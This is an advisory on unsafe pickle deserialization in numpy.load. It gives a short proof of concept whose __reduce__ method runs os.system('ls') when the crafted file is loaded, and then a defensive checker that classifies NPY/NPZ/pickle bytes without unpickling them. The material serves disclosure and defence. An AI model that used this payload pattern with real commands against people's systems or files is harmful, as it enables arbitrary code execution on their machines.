numpy is a fundamental package needed for scientific computing with Python.
Affected versions of this package are vulnerable to Arbitrary Code Execution.
It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.
PoC by nanshihui:
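import os
import pickle
import numpy
from numpy import __version__

class Test(object):
    def __init__(self):
        self.a = 1

    def __reduce__(self):  # unpickling this object calls os.system('ls')
        return (os.system, ('ls',))

tmpdaa = Test()
with open("a-file.pickle", 'wb') as f:
    pickle.dump(tmpdaa, f)
numpy.load("a-file.pickle")  # affected versions unpickle the file here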
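
As an added example (not part of the advisory or of numpy's own code), the check below classifies a file's bytes by how numpy.load would treat them, without unpickling anything. It assumes the published NPY header layout (magic, version bytes, little-endian header length, dict literal); the function names are hypothetical and the sample inputs are constructed.

```python
import ast
import pickle
import struct

NPY_MAGIC = b"\x93NUMPY"
ZIP_MAGICS = (b"PK\x03\x04", b"PK\x05\x06")  # NPZ archives are zip files


def _has_object(descr):
    """True if an NPY 'descr' (string or list of field tuples) holds object dtype."""
    if isinstance(descr, str):
        return descr.lstrip("<>|=").startswith("O")
    return any(_has_object(field[1]) for field in descr)


def classify(data):
    """Report how numpy.load would treat these bytes; nothing is unpickled."""
    if data.startswith(ZIP_MAGICS):
        return "npz"  # archive: every member needs the same check
    if not data.startswith(NPY_MAGIC):
        return "pickle-fallback"  # neither NPY nor NPZ: loadable only via pickle
    major = data[6]
    # Format 1.0 stores the header length as uint16, 2.0 and 3.0 as uint32.
    size_fmt, offset = ("<H", 10) if major == 1 else ("<I", 12)
    (hlen,) = struct.unpack_from(size_fmt, data, 8)
    header = ast.literal_eval(data[offset:offset + hlen].decode("latin1"))
    # Object arrays store their elements as a pickle stream after the header.
    return "npy-object" if _has_object(header["descr"]) else "npy-plain"


def _npy(descr):
    """Constructed sample: a format 1.0 NPY header for an empty array."""
    header = repr({"descr": descr, "fortran_order": False, "shape": (0,)}).encode()
    header += b" " * (-(10 + len(header) + 1) % 64) + b"\n"
    return NPY_MAGIC + b"\x01\x00" + struct.pack("<H", len(header)) + header


if __name__ == "__main__":
    samples = {
        "float array": _npy("<f8"),
        "object array": _npy("|O"),
        "record with object field": _npy([("id", "<i4"), ("obj", "|O")]),
        "raw pickle (benign dict)": pickle.dumps({"a": 1}),
    }
    for name, blob in samples.items():
        print(f"{name}: {classify(blob)}")
```

Only the "npy-plain" class can be read without pickle; numpy.load(path, allow_pickle=False) refuses the "npy-object" and "pickle-fallback" cases.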